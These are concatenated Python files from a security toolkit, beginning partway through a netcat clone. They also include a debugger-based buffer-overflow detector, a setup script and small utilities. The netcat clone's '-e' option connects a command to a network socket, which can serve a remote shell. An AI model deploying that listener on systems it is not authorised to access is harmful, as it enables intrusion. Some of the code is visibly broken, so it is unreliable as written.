	def setSocket(self, socket):
		self.s = socket
		self.fd2 = socket.fileno()
		self.fd = socket.fileno()

	def setRAddr(self, addr):
		self.raddr = (addr)

	def setRPort(self, port):
		self.rport = int(port)

	def setLAddr(self, addr):
		self.laddr = (addr)

	def setLPort(self, port):
		self.lport = int(port)

	def setProto(self, proto):
		if (type(proto) == "str"):
			try:
				proto = int(proto)
			except:
				proto = getprotobyname(proto)
		self.proto = proto

	def setFILE(self, fin, fout):
		self.fin = fin
		self.fout = fout
		self.fd = fin.fileno()
		self.fd2 = fout.fileno()

	def setCMD(self,cmd):
		self.fout, self.fin = popen4(cmd, -1)
		self.fd2 = self.fout.fileno()
		self.fd = self.fin.fileno()

	def close(self):
		try:
			close(self.fd)
			close(self.fd2)
		except:
			pass


	def makeTCP(self, s=None):
		if (s):		self.setSocket(s)
		self.send = self.sendTCP
		self.recv = self.recvTCP

	def makeUDP(self, s=None):
		if (s):		self.setSocket(s)
		self.send = self.sendUDP
		self.recv = self.recvUDP
		
	def makeRAW(self, s=None, proto=None):
		if (s):		self.setSocket(s)
		self.send = self.sendRAW
		self.recv = self.recvRAW
		if (proto):	self.setProto(proto)
			
		
	def makeFILE(self, fin=None, fout=None):
		if (fin):	self.setFILE(fin,fout)
		self.send = self.sendFILE
		self.recv = self.recvFILE

	def makeCMD(self, cmd=None):
		if cmd:  self.setCMD(cmd)
		self.send = self.sendCMD
		self.recv = self.recvCMD



	def sendTCP(self, data):
		buf = data
		self.s.setblocking(1)
		self.s.sendall(buf)
		self.s.setblocking(0)
		
	def sendUDP(self, data, addr=None, port=None):
		if (not addr): 
			addr = self.raddr
		if (not port): 
			port = self.rport
		buf = data
		while (len(buf) > 16384):
			self.s.sendto(buf[:16384], (addr,port))
			buf = buf[16384:]
		self.s.sendto(buf, (addr,port))
		
	def sendRAW(self, data, addr=None, port=0):
		if (not addr): 
			addr = self.raddr
		if (self.rport): 
			port = self.rport
		buf = data
		print ("%s %d"%(addr,port))
		while (len(buf) > 16384):
			self.s.sendto(buf[:16384], (addr,port))
			buf = buf[16384:]
		self.s.sendto(data, (addr,port))
		
	def sendFILE(self, data):
		self.fout.write(data)
		self.fout.flush()
		
	def sendCMD(self, data):
		self.sendFILE(data)


	def recvTCP(self,size=1000000):
		data = self.s.recv(size)
		return data

	def recvUDP(self,size=1000000):
		(data, addr) = self.s.recvfrom(size, self.lport)
		if ((not MONOGOMOUS) or (not self.raddr)):  
			self.raddr,d = addr
		if ((not MONOGOMOUS) or (not self.rport)):  
			d,self.rport = addr
		return data
		
	def recvRAW(self,size=1000000):
		(data, addr) = self.s.recvfrom(size, self.laddr)
		if ((not MONOGOMOUS) or (not self.raddr)):  
			self.raddr,d = addr
		if ((not MONOGOMOUS) or (not self.rport)):  
			d,self.rport = addr
		return data
		
	def recvFILE(self,size=1000000):
		data = read(self.fd, size)
		if INTERACTIVE and self.isStdin:
			#print >>sys.stderr,('INTERACTIVE')
			return(eval('"%s"'%data.strip())+'\n')
		return data
		
	def recvCMD(self,size=1000000):
		data = self.recvFILE(size)
		return data

	def select(self, wait=0):
		x, y, z = select([self.fd,self.fd2],[],[self.fd],wait)
		if (self.fd in x): return True
		if (self.fd in z): raise exception
		return False
		
		


def manageConn(wrcht1, wrcht2, wait = None):
	""" manageCommand() handles I/O with a child process
		wrcht1 and wrcht2 are wratchet objects which implement both sides of this communication.

		formerly:
		cmd == command to be executed
		fin == "stdin" equivalent for cmd.  This will be read from
		fout == "stdout" equivalent for cmd.  This will be written to
	"""
	try:
		tmp = None
		idle = 0
		while (True):
			### socket input handling ###
			if (wrcht1.select()):
				idle = 0
				tmp = wrcht1.recv()
				if (len(tmp) == 0):
					break
				if (VERYVERBOSE): sys.stderr.write("sckt: len: %d\n%s"%(len(tmp),tmp))
				wrcht2.send(tmp)
	

			### command input handling ###
			if (wrcht2.select()):
				idle = 0
				tmp = wrcht2.recv()
				if (VERYVERBOSE): sys.stderr.write("cmd:  len: %d\n%s"%(len(tmp),tmp))
				if (len(tmp) == 0): 
					break
				wrcht1.send(tmp)


			idle += 1
			if (wait and idle > (wait*10)):
				break
			select([],[],[], .1)
	except: 
		print >>sys.stderr,("Score!!")
		try:
			sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
			wrcht1.close()
			wrcht2.close()
		except:
			pass
			sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])

##################################################

def syntax():
	print """
netcat on python... a crushing experience.  (ver %s)

Syntax:   %s  [-v] [-I] [-l] [-L] [-u] [-p port] [-P proto] [-e cmd] [host [port]]
	-v		verbose
	-I		Interactive - interprets \\x## characters
	-l		listen
	-L		Listen Harder!  (restart connection/listen)
	-u		use UDP  (don't use with -P option; default: TCP)
	-w #		wait # seconds of inactivity before exiting
	-e cmd		connect this socket to a command
	-p port		set local port
	-P proto	use protocol 'proto' (RAW Sockets, must have rights)

"""%(VER, sys.argv[0])
	sys.exit(1)

### TCP server -e
def elistenerTCP(port,cmd):
	try:
		a = None
		s = socket()
		s.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
		s.bind(("0.0.0.0",int(sys.argv[1])))
		s.listen(10000)
		a,addy = s.accept()
		a.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
		a.setblocking(False)
		#### as = active socket, addy = address on the other end
		#### let the fun begin
		
		manageCommand(sys.argv[2], a, a)
	
		a.close()
	except:
		print("Error:  %s"%sys.exc_info()[0])
		sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
	a.close()

### UDP server -e
def elisternerUDP(port, cmd):
	try:
		s = socket(AF_INET,SOCK_DGRAM)
		s.bind(("0.0.0.0",int(sys.argv[1])))
		
		so = wratchet(s, int(sys.argv[1]))
		so.makeUDP()
		
		cmd = wratchet()
		cmd.makeCMD(sys.argv[2])
		
		manageConn(so,cmd)
	
		s.close()
	except:
		print("Error:  %s"%sys.exc_info()[0])
		sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
	s.close()

### RAW socket, protocol of your choosing, -e
def elisternerRAW(protocol, cmd, port=0):
	try:
		s = socket(AF_INET,SOCK_RAW,protocol)
		so = wratchet(s)
		so.makeRAW()
		
		cmd = wratchet()
		cmd.makeCMD(cmd)
		
		manageConn(so,cmd)
	
		s.close()
	except:
		print("Error:  %s"%sys.exc_info()[0])
		sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
	s.close()


LISTEN = False
HARDER = False
PROTO = 6  # TCP protocol number
RHOST = None
RPORT = None
LHOST = "0.0.0.0"
LPORT = 0
CMD = None
s = None
so = None
lso = None
if __name__ == "__main__":
  while (len(sys.argv) > 1):
	if (sys.argv[1] == '--help'):
        	syntax()
        	exit(1)
	elif (sys.argv[1] == "--sniff"):
		sys.argv.pop(1)
		RAW_SNIFF = True
	elif (sys.argv[1] == "-I"):
		sys.argv.pop(1)
		INTERACTIVE = True
	elif (sys.argv[1] == "-l"):
		sys.argv.pop(1)
		LISTEN = True
	elif (sys.argv[1] == "-L"):
		sys.argv.pop(1)
		LISTEN = True
		LISTENHARDER = True
	elif (sys.argv[1] == "-u"):
		sys.argv.pop(1)
		PROTO = 17
	elif (sys.argv[1] == "-e"):
		sys.argv.pop(1)
		CMD = sys.argv.pop(1)
	elif (sys.argv[1] == "-v"):
		sys.argv.pop(1)
		VERBOSE = True
	elif (sys.argv[1] == "-vv"):
		sys.argv.pop(1)
		VERBOSE = True
		VERYVERBOSE = True
	elif (sys.argv[1] == "-p"):
		sys.argv.pop(1)
		LPORT = int(sys.argv.pop(1))
	elif (sys.argv[1] == "-P"):
		sys.argv.pop(1)
		PROTO = sys.argv.pop(1)
		try:
			PROTO = int(PROTO)
		except:
			PROTO = getprotobyname(PROTO)

	elif (sys.argv[1] == "-w"):
		sys.argv.pop(1)
		WAIT = int(sys.argv.pop(1))
	elif (RHOST):
		RPORT = int(sys.argv.pop(1))
	else:
		RHOST = sys.argv.pop(1)
		
		

  try:
	GO = True
	while (GO):
		if (PROTO == 6): 
			s = socket()
			if (LISTEN):
				if (VERBOSE): 	print >>sys.stderr,("listening on [%s] %d ..."%(LHOST,LPORT))
				s.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
				s.bind((LHOST,LPORT))
				s.listen(10000)
				a,addy = s.accept()
				a.setblocking(False)
				a.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
				RA,RP = addy
				so = wratchet(a, LHOST,LPORT, RA, RP)
				if (VERBOSE):	print >>sys.stderr,("connect to [%s] from localhost.localdomain [%s] %d"%(s.getsockname(),RA,RP))


			else:
				if (VERBOSE):   print >>sys.stderr,("%s %s"%(RHOST,RPORT))
				s.connect((RHOST,RPORT))
				so = wratchet(s, LHOST,LPORT, RHOST,RPORT)
				
			
		elif (PROTO == 17): 
			s = socket(AF_INET,SOCK_DGRAM)
			so = wratchet(s, LHOST, LPORT, RHOST, RPORT, PROTO)
			so.makeUDP()
			s.bind(("0.0.0.0",LPORT))
			if (LISTEN):	
				if (VERBOSE): 	print >>sys.stderr,("listening on [%s] %d ..."%(LHOST,LPORT))
				while (not so.select(.1)): pass
			else:
				if (VERBOSE):   print >>sys.stderr,("%s %s"%(RHOST,RPORT))
				
				
			
		else: 
			s = socket(AF_INET,SOCK_RAW, PROTO)
			so = wratchet(s,LHOST,LPORT,RHOST,RPORT,PROTO)
			so.makeRAW()
			if (LISTEN):
				if (VERBOSE): 	print >>sys.stderr,("listening on [%s] protocol %d ..."%(LHOST,PROTO))
				while (not so.select(.1)): pass
			else:
				if (VERBOSE):   print >>sys.stderr,("%s %s"%(RHOST,PROTO))
	
		lso = wratchet()
		
		if (CMD):
			lso.makeCMD(CMD)
		else:
			lso.makeFILE(sys.stdin, sys.stdout)
			lso.isStdin = True
		
		manageConn(so,lso)
	
		so.close()
		lso.close()
	
		if (not LISTENHARDER):
			GO=False

  except:
	print("Error:  %s"%sys.exc_info()[0])
	sys.excepthook(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])

  try:
	lso.close()
  except:
	pass

  try:
	so.close()
  except:
	pass




'''
vivisect script (`script /path/to/this.py`)
'''
import envi.interactive as ei
import atlasutils.emutils as aemu
try:
    emu = vw.getEmulator()
    temu = aemu.TestEmulator(emu, verbose=True, fakePEB=True, guiFuncGraphName='FuncGraph0')

    if len(argv) > 1:
        codeva = vw.parseExpression(argv[1])
        emu.setProgramCounter(codeva)

except Exception as e:
    print(e)

STYPE_NONE = 0
STYPE_IPYTHON = 1
STYPE_CODE_INTERACT = 2

def interact(lcls, gbls, intro=""):
    shelltype = STYPE_NONE
    try:
        import IPython.Shell
        ipsh = IPython.Shell.IPShell(argv=[''], user_ns=lcls, user_global_ns=gbls)
        print(intro)
        shelltype = STYPE_IPYTHON

    except ImportError as e:
        try:
            from IPython.terminal.interactiveshell import TerminalInteractiveShell
            ipsh = TerminalInteractiveShell()
            ipsh.user_global_ns.update(gbls)
            ipsh.user_global_ns.update(lcls)
            ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
            shelltype = STYPE_IPYTHON
            print(intro)

        except ImportError as e:
            try:
                from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
                ipsh = TerminalInteractiveShell()
                ipsh.user_global_ns.update(gbls)
                ipsh.user_global_ns.update(lcls)
                ipsh.autocall = 2       # don't require parenthesis around *everything*.  be smart!
                shelltype = STYPE_IPYTHON

                print(intro)
            except ImportError as e:
                print(e)
                shell = code.InteractiveConsole(gbls)
                shelltype = STYPE_IPYTHON
                print(intro)

    if shelltype == STYPE_IPYTHON:
        ipsh.mainloop()

    elif shelltype == STYPE_CODE_INTERACT:
        shell.interact()

    else:
        print("SORRY, NO INTERACTIVE OPTIONS AVAILABLE!!  wtfo?")

interact(locals(), globals())




import os
import sys
from setuptools import find_packages, setup

VERSION = '3.0.3'
desc = 'atlas\' hacking toolbelt full of toys'

mods = []
pkgdata = {'vivscripts': ['vivscripts/*']}

scripts = []
for s in os.listdir('scripts'):
    if s != '.git':
        scripts.append('scripts/%s'%s)


setup  (name        = 'atlasutils',
        version     = VERSION,
        description = desc,
        long_description=desc,
        long_description_content_type='text/markdown',
        author = 'atlas of d00m',
        author_email = 'atlas@r4780y.com',
        url = 'https://github.com/atlas0fd00m/atlasutils',
        packages = find_packages(),
        package_data = pkgdata,
        ext_modules = mods,
        scripts = scripts
       )



#!/usr/bin/python
import sys

def ascii2binary(ascii, LSB=True, one='1', zero='0'):
	output = ""
	for x in range(len(ascii)):
		temp = ""
		byt = ord(ascii[x])
		for i in range(8,0,-1):
			c = byt / (2**(i-1))
			#print ("%d / %d: %d"%(byt,2**(i-1),c))
			if (c == 1):  byt -= (2**(i-1))
			temp += (zero, one)[c]
				
		output += temp
	return output


def bin2ascii(binarystr, LSB=True, one='1', zero='0'):
    output = ""
    x=0
    while (x < len(binarystr)-1):
        byt = 0
        offset = 0
        for ci in xrange(8):
            try:
                i = binarystr[x+offset+ci]
                while i not in [one, zero]:
                    offset += 1
                    i = binarystr[x+offset+ci]
                byt *= 2
                if i == one:  
                    byt += 1
            except Exception,e:
                print >>sys.stderr,("Error '%s'...  Problems in char %s.  Not binary?  Should be either a '0' or a '1'"%(e,i))
                
        output += chr(byt)
        x += 8 + offset
    return output






#!/usr/bin/python -i

from atlasutils.vtraceutils import *
from atlasutils.vtraceheaputils import *
from atlasutils.smartprint import *
from atlasutils import *
#from disass3 import *
import struct
import time
from threading import *
"""
List of Badguy Targets to Watch:
strcpy()
strncpy()
strcat()
strncat()
sprintf()
scanf()
sscanf()
fscanf()
vfscanf()
vsprintf
vscanf()
vsscanf()
streadd()
strecpy()
strtrns()
memcpy()
memccpy()
mempcpy()
memmove()
memchr()
memrchr()
xgets()
fgets()

"""



BITS = 32
AddrFmt='L'
AddrBytes = BITS/8
AddrHeapMallocMask = -8
EXAMPLE_MEMORY_LENGTH = 24


def getHeapChunkDLMalloc(tracer, heapaddress):
    sz=0xffffffff
    heap,hlen,htyp,hname= me.getMap(heapaddress)
    endaddress = heap+hlen
    chunk=heap
    while sz != 0 and chunk < heapaddress and chunk < endaddress:
        #print XW(me,heap+off,8)
        sz = me.readMemoryFormat(chunk+4,"L")[0] & AddrHeapMallocMask
        chunk += sz
    return (chunk - sz, sz)   #had to overshoot to find it...

    
def getHeapLenDLMalloc(tracer, heapaddress):
    #sz = me.readMemoryFormat(chunk+4,"L")[0] & AddrHeapMallocMask
    #if sz < 1 or sz > 
    #
    #base, sz = getHeapChunkDLMalloc(tracer, heapaddress)
    return findNextHeap(tracer, heapaddress) - heapaddress
    
"""         Tracking HEAP is somewhat costly if the buffer is near the end
>>> t=time.time();getHeapLenDLMalloc(me,0x8250319); w=time.time(); print w-t
19687L
14.8094928265
>>> t=time.time();getHeapLenDLMalloc(me,0x8250319); w=time.time(); print w-t
19687L
11.0967998505
>>> t=time.time();getHeapLenDLMalloc(me,0x8250319); w=time.time(); print w-t
19687L
14.7216470242
>>> t=time.time();getHeapLenDLMalloc(me,0x8250319); w=time.time(); print w-t
19687L
14.8756971359
>>> t=time.time();getHeapLenDLMalloc(me,0x8250319); w=time.time(); print w-t
19687L
12.1300940514

"""


getHeapLen = getHeapLenDLMalloc

class VulnEvent(Exception):
    def __init__(self, trace, location, type, src=0, dest=0, len=0, destlen=0):
        self.location = location
        self.dest = dest
        self.src = src
        self.len = len
        self.destlen = destlen
        self.trace = trace
        self.data = ""
        self.message = "%s Event (%x): dest: %x <- src: %x, cpylen(%x) > destlen(%x)"%(type, location, dest, src, len, destlen)


class BOFException(VulnEvent):
    def __init__(self, trace, location, type, src=0, dest=0, len=0, destlen=0):
        VulnEvent.__init__(self, trace, location, type, src, dest, len, destlen)
        self.message = "%s Overflow (%x): dest: %x <- src: %x, len(%x) > destlen(%x) -- Potential Buffer Overflow."%(type, location, dest, src, len, destlen)

class BOFDifferingLengthException(VulnEvent):
    def __init__(self, trace, location, type, src=0, dest=0, len=0, destlen=0, prevdestlen=0):
        VulnEvent.__init__(self, trace, location, type, src, dest, len, destlen)
        self.prevdestlen = prevdestlen
        self.message = "%s Variation (%x): dest: %x <- src: %x, len(%x) > destlen(%x) -- Copy Length Differs (prev: %x)."%(type, location, dest, src, len, destlen, prevdestlen)


class TestBreakpointSubscriber():
    def __init__(self):
        self.threads = []
        self.queue = []
        self.cont = True
        self.events = {}
        self.maxthreads = 1
        for x in xrange(self.maxthreads):
            t = Thread(target=self.notifythread)
            t.setDaemon(True)
            t.start()
            self.threads.append(t)

    def __del__(self):
        self.cont = False
        for x in self.threads:
            x.stop()
        self.threads = []
        
    def notify(self, exception):
        try:
            exception.data = exception.trace.readMemory(exception.src, exception.len)
        except:
            errorhandler()
        self.queue.append(exception)
        
    def notifythread(self):
        while self.cont:
            try:
                work = self.queue.pop()
            except:
                time.sleep(.1)
                continue
            print >>stderr,("Notify: %s\n%s"%(work.message, hexText(work.data)))
            key = "%s:%s"%(work.location, work.dest)
            store = self.events.get(key, None)
            if store == None:
                store = []
            store.append(work)
            self.events[key] = store
        


class BreakpointPublisher(Breakpoint):
    """
    BreakpointPublisher is a subclass of vtrace's Breakpoint class, and provides the mechanisms required for generic event-publishing, such as subscribing, unsubscribing, and subscriber notification.
    """
    def __init__(self, address):
        Breakpoint.__init__(self, address)
        self.subscribers = []
    
    def subscribe(self, subscriber):
        """ subscribers are expected to implement a "notify(self, exception)" where exception is an object which stores pertinent info about the issue, preferably implementing __str__(self) to describe itself.
        """
        if (not subscriber in self.subscribers):
            self.subscribers.append(subscriber)
    
    def unsubscribe(self, subscriber):
        if (subscriber in self.subscribers):
            self.subscribers.remove(subscriber)
    
    def publish(self, exception):
        for e in self.subscribers: 
            e.notify(exception)
    
    
class BOFBreakpoint(BreakpointPublisher):
    """
    BOFBreakpoint is a subclass of BreakpointPublisher and provides assistance methods which should prove beneficial to all BOFBreaker implementations such as MemcpyBreaker and StrcpyBreaker.
    """
    def __init__(self, tracer, minlen=5, address = None, verbose = False, subscriber = TestBreakpointSubscriber()):
        BreakpointPublisher.__init__(self, address)
        self.tracker = {}
        self.variance = {}
        self.verbose = verbose
        self.minlen = minlen
        self.subscribe(subscriber)
    




class MemcpyBreaker(BOFBreakpoint):
    """  
    This class is currently only after:
      * stack overflows which reach ebp
      * calls where the cpylen is dynamic (ie, calls from the same line of code have a different)
      * heap overflows which reach the next heap node.
    
    Future versions may add in stack variable overflows using disass3 subroutine objects (which must be provided)
    This will allow you to catch overflows which only grown beyond their own length, allowing tampering with other stack variables
    """
    def __init__(self, tracer, minlen=5, address = None, verbose = False, subscriber = TestBreakpointSubscriber()):
        self.pltloc = address
        if (self.pltloc == None):
            if os.name=='posix':
                self.pltloc = tracer.parseExpression('libc.memcpy')
            elif os.name=='nt':
                self.pltloc = tracer.parseExpression('msvcr71.memcpy')
        BOFBreakpoint.__init__(self, tracer, minlen, self.pltloc, verbose, subscriber)
        tracer.addBreakpoint(self)
    
    
    def notify(self, event, trace):
        eip = trace.getProgramCounter()
        esp = trace.getRegisterByName('esp')
        ebp = trace.getRegisterByName('ebp')
        copylen = trace.readMemoryFormat((esp + 0xc),AddrFmt)[0]
        retptr  = trace.readMemoryFormat((esp + 0x0),AddrFmt)[0]
        dest    = trace.readMemoryFormat((esp + 0x4),AddrFmt)[0]
        src     = trace.readMemoryFormat((esp + 0x8),AddrFmt)[0]
        destlen = 0
        
        mmap = trace.getMap(dest)
        #print >>stderr,(mmap[3])
        if ('[stack]' == mmap[3]):
            
            destlen = findRET(trace, dest) - dest
            #print >>stderr,("%x"%destlen)
        elif ('[heap]' == mmap[3]):
            destlen = getHeapLen(trace, dest)
            #print >>stderr,("%x"%destlen)
        else:
            destlen = ebp - dest
        
        # If the copylen is greater than the length of our destination... 
        if (copylen > destlen):
            self.publish(BOFException(trace, retptr, 'memcpy(%s)'%mmap[3], src, dest, copylen, destlen))
        
        ### Track changes to copy length
        ### The basic idea is that changes in the copy length could indicate we have control over it.
        ### At this point, it makes the most sense to track dest-buffer/copy combinations, since different 
        ###   buffers may be copied at the same location.  Obviously the location is important, so we combine them.
        key = "%x:%x"%(retptr,dest)
        prevlen = self.tracker.get(key, None)
        if (prevlen == None):
            self.tracker[key] = copylen
        elif (prevlen != copylen):
            ### Let's keep track of the variations so we can pull them later.
            variance = self.variance.get(key, None)
            if variance == None:
                variance = []
                variance.append(copylen)
            elif copylen not in variance:
                variance.append(copylen)
            self.variance[key] = variance
            ### ALERT - Changing length from same call....
            self.publish(BOFDifferingLengthException(trace, retptr, 'memcpy', src, dest, copylen, destlen, prevlen))
        
        if (self.verbose):                              # If we're being Verbose, mention every break
            self.publish(VulnEvent(trace, retptr, 'memcpy', src, dest, copylen, destlen))














class StrncpyBreaker(BOFBreakpoint):
    """  
    This class is currently only after:
      * stack overflows which reach ebp
      * calls where the cpylen is dynamic (ie, calls from the same line of code have a different)
      * heap overflows which reach the next heap node.
    
    Future versions may add in stack variable overflows using disass3 subroutine objects (which must be provided)
    This will allow you to catch overflows which only grown beyond their own length, allowing tampering with other stack variables
    """
    def __init__(self, tracer, minlen=5, address = None, verbose = False, subscriber = TestBreakpointSubscriber()):
        self.pltloc = address
        if (self.pltloc == None):
            if os.name=='posix':
                self.pltloc = tracer.parseExpression('libc.strncpy')
            elif os.name=='nt':
                self.pltloc = tracer.parseExpression('msvcr71.strncpy')
        BOFBreakpoint.__init__(self, tracer, minlen, self.pltloc, verbose, subscriber)
        tracer.addBreakpoint(self)


    def notify(self, event, trace):
        eip = trace.getProgramCounter()
        esp = trace.getRegisterByName('esp')
        ebp = trace.getRegisterByName('ebp')
        retptr  = trace.readMemoryFormat((esp + 0x0), AddrFmt)[0]
        dest    = trace.readMemoryFormat((esp + 0x4), AddrFmt)[0]
        src     = trace.readMemoryFormat((esp + 0x8), AddrFmt)[0]
        copylen = trace.readMemoryFormat((esp + 0xc), AddrFmt)[0]
        destlen = 0
        if copylen >= self.minlen: 
            mmap = trace.getMap(dest)
            if ('[stack]' == mmap[3]):
                # Virtual %EBP, since %EBP likely can't be trusted....
                destlen = findRET(trace, dest) - dest
            elif ('[heap]' == mmap[3]):
                destlen = getHeapLen(trace, dest)
                
            # Check for previous hits
            if (self.tracker.get(retptr, None) == None):
                self.tracker[retptr] = copylen
            elif (self.tracker[retptr] != copylen):
                self.publish(BOFDifferingLengthException(trace, retptr, 'strncpy', src, dest, copylen, destlen))### ALERT - Changing length from same call....
            
            if (copylen >= maxlen):     # If the copylen is greater than the length of our destination... 
                self.publish(BOFException(trace, retptr, 'strncpy', dest, src, copylen, destlen))
            
            ### Track Changes in copy length
            ### The basic idea is that changes in the copy length could indicate we have control over it.
            ### At this point, it makes the most sense to track dest-buffer/copy combinations, since different 
            ###   buffers may be copied at the same location.  Obviously the location is important, so we combine them.
            key = "%x:%x"%(retptr,dest)
            prevlen = self.tracker.get(key, None)
            if (prevlen == None):
                self.tracker[key] = copylen
            elif (prevlen != copylen):
                variance = self.variance.get(key, None)
                if variance == None:
                    variance = []
                    variance.append(copylen)
                elif copylen not in variance:
                    variance.append(copylen)
                self.variance[key] = variance
                self.publish(BOFDifferingLengthException(trace, retptr, 'memcpy', src, dest, copylen, destlen, prevlen))### ALERT - Changing length from same call....
                
        if (self.verbose):          # If we're being Verbose, mention every call to it
            self.publish(VulnEvent(trace, retptr, 'strncpy', src, dest, copylen, destlen))














class StrcpyBreaker(BOFBreakpoint):
    """  
    This class is currently only after:
      * stack overflows which reach ebp
      * calls where the cpylen is dynamic (ie, calls from the same line of code have a different)
      * heap overflows which reach the next heap node.
    
    Future versions may add in stack variable overflows using disass3 subroutine objects (which must be provided)
    This will allow you to catch overflows which only grown beyond their own length, allowing tampering with other stack variables
    """
    def __init__(self, tracer, minlen=5, address = None, verbose = False, subscriber = TestBreakpointSubscriber()):
        self.pltloc = address
        if (self.pltloc == None):
            if os.name=='posix':
                self.pltloc = tracer.parseExpression('libc.strcpy')
            elif os.name=='nt':
                self.pltloc = tracer.parseExpression('msvcr71.strcpy')
        BOFBreakpoint.__init__(self, tracer, minlen, self.pltloc, verbose, subscriber)
        tracer.addBreakpoint(self)


    def notify(self, event, trace):
        eip = trace.getProgramCounter()
        esp = trace.getRegisterByName('esp')
        ebp = trace.getRegisterByName('ebp')
        retptr  = trace.readMemoryFormat((esp + 0x0), AddrFmt)[0]
        dest    = trace.readMemoryFormat((esp + 0x4), AddrFmt)[0]
        src     = trace.readMemoryFormat((esp + 0x8), AddrFmt)[0]
        copylen = trace.readMemoryFormat((esp + 0xc), AddrFmt)[0]
        destlen = 0
        address = 0
        
        if copylen >= self.minlen:
            mmap = trace.getMap(dest)
            if ('[stack]' == mmap[3]):
                # Virtual %EBP, since %EBP likely can't be trusted....
                destlen = findRET(trace, dest) - dest
            elif ('[heap]' == mmap[3]):
                # Platform-dependent architecture
                destlen = getHeapLen(trace, dest)
            
            # This is strcpy, source length is important
            mmap = trace.getMap(src)
            if ('stack' in mmap[3]):
                # Virtual %EBP, since %EBP obviously can't be trusted....
                srclen = findRET(trace, src) - src
            elif ('heap' in mmap[3]):
                srclen = getHeapLen(trace, src)

            ## Check for previous hits
            #if (self.tracker.get(retptr, None) == None):
                #self.tracker[retptr] = copylen
            #elif (self.tracker[retptr] != copylen):
                #self.publish(BOFDifferingLengthException(retptr, 'strncpy', dest, src, copylen, destlen))### ALERT - Changing length from same call....
            
            if (srclen >= destlen):     # If the copylen is greater than the length of our destination... 
                self.publish(BOFException(trace, retptr, 'strncpy', src, dest, srclen, destlen))
            
            ### Track Changes in copy length
            ### The basic idea is that changes in the copy length could indicate we have control over it.
            ### At this point, it makes the most sense to track dest-buffer/copy combinations, since different 
            ###   buffers may be copied at the same location.  Obviously the location is important, so we combine them.
            key = "%x:%x"%(retptr,dest)
            prevlen = self.tracker.get(key, None)
            if (prevlen == None):
                self.tracker[key] = copylen
            elif (prevlen != copylen):
                variance = self.variance.get(key, None)
                if variance == None:
                    variance = []
                    variance.append(copylen)
                elif copylen not in variance:
                    variance.append(copylen)
                self.variance[key] = variance
                self.publish(BOFDifferingLengthException(trace, retptr, 'memcpy', src, dest, srclen, destlen, prevlen))### ALERT - Changing length from same call....
                
        if (self.verbose):          # If we're being Verbose, mention every call to it
            self.publish(VulnEvent(trace, retptr, 'strncpy', src, dest, srclen, destlen))



#######################################################################################################################
me = getTrace()
mcb = None
scb = None
sncb = None

if __name__ == "__main__" and len(argv) > 1:
    if len(argv) == 3:
        me.attach(int(argv[2]))
    elif len(argv) == 2:
        me.execute(argv[1])
    else:
        print ("Syntax:   %s <binary> [pid]"%argv[0])
        exit(1)
    #verbose = True
    me.registerNotifier(vtrace.NOTIFY_BREAK, VerboseNotifier())
    
    t = TestBreakpointSubscriber()
    mcb = MemcpyBreaker(me, verbose=verbose, subscriber = t)
    scb = StrcpyBreaker(me, verbose=verbose, subscriber = t)
    sncb = StrncpyBreaker(me, verbose=verbose, subscriber = t)
    me.setMode("RunForever", True)
    me.setMode("NonBlocking", True)
    me.run()
    """
    >>> me.searchMemoryRange('\x8bL$\x0c\x89\xf8\x8b|$\x04\x89\xf2\x8bt$\x08\xfc\xd1\xe9s\x01\xa4\xd1\xe9s\x02f\xa5\xf3\xa5\x89\xc7\x89\xd6\x8bD$\x04\xc3\x90', 0xb7b91000,0x13b000)
    [3082814256L]
    """
    
"""
###  Studying Opcodes
from atlasutils.smartprint import *
from atlasutils.disassutils import *

lens = {}
for x in range(256):
  op=Opcode('\xff%cAAAAAAA'%x)
  if op.printOpcode(0)[0] == 'c':
    lens[op.off] = op
    print "%d:  %s  %s"%(x,hexText(op.data),op.printOpcode(0))


for x in lens.keys():
  print "%d:  %s  %s"%(x,hexText(lens[x].data),lens[x].printOpcode(0))




HEAPCRAWLER:
sz=0xfffff
off=0
heap= 134557696
while sz != 0:
    print XW(me,heap+off,8)
    sz = me.readMemoryFormat(heap+off+4,"L")[0]
    off += (sz &0xfffffffe)

"""
import sys

ERROR_COUNT=0

def errorhandler():
    global ERROR_COUNT
    ERROR_COUNT += 1
    x,y,z = sys.exc_info()
    sys.excepthook(x,y,z)
    



import time
import random
import vivisect

from visual import *

STABILITY_CONST =   2
GRAVITY_COEFF =     .1
NODE_FORCE_COEFF =  .5
EDGE_SPRING_COEFF = .5


class Node(sphere):
    def __init__(self, system, ident, color=color.blue):
        x = random.randint(1, system.ceiling)
        y = random.randint(1, system.ceiling)
        z = random.randint(1, system.ceiling)
        pos = vector(x,y,z)
        sphere.__init__(self, pos=pos, radius=1)
        self.system = system
        self.edges = []
        self.ident = ident
        self.color = color

    def updateEdges(self):
        for edge in self.edges:
            edge.updatePosition()

    def applyGravity(self):
        raise(Exception("IMPLEMENT ME: applyGravity"))

    def applyForces(self, coeff=1):
        raise(Exception("IMPLEMENT ME: applyForces"))

    def __repr__(self):
        return "  ".join([repr(self.__class__.__name__), hex(self.ident), repr(self.pos), repr(self.color) ])




class Edge(cylinder):
    def __init__(self, nodepairtup):
        n1,n2 = nodepairtup
        cylinder.__init__(self, pos=n1.pos, axis=(n2.pos-n1.pos), radius=.1)

        self.nodes = nodepairtup
        for node in nodepairtup:
            node.edges.append(self)

        print >>sys.stderr,("===== NEW EDGE CREATION ===== %s %s" % (nodepairtup))
        self.updatePosition()

    def updatePosition(self):
        n1,n2 = self.nodes
        self.pos=n1.pos
        self.axis=(n2.pos-n1.pos)

    def __repr__(self):
        n1,n2 = self.nodes
        return "".join([ "edge:", hex(n1.ident),"<->", hex(n2.ident), "  ", repr(self.pos), "/", repr(self.axis) ])

class System:
    def __init__(self):
        self.floor = box (pos=(0,0,0), length=400, height=0.5, width=400, color=(.05,.001,.3))
        self.nodes = {}
        self.edges = {}
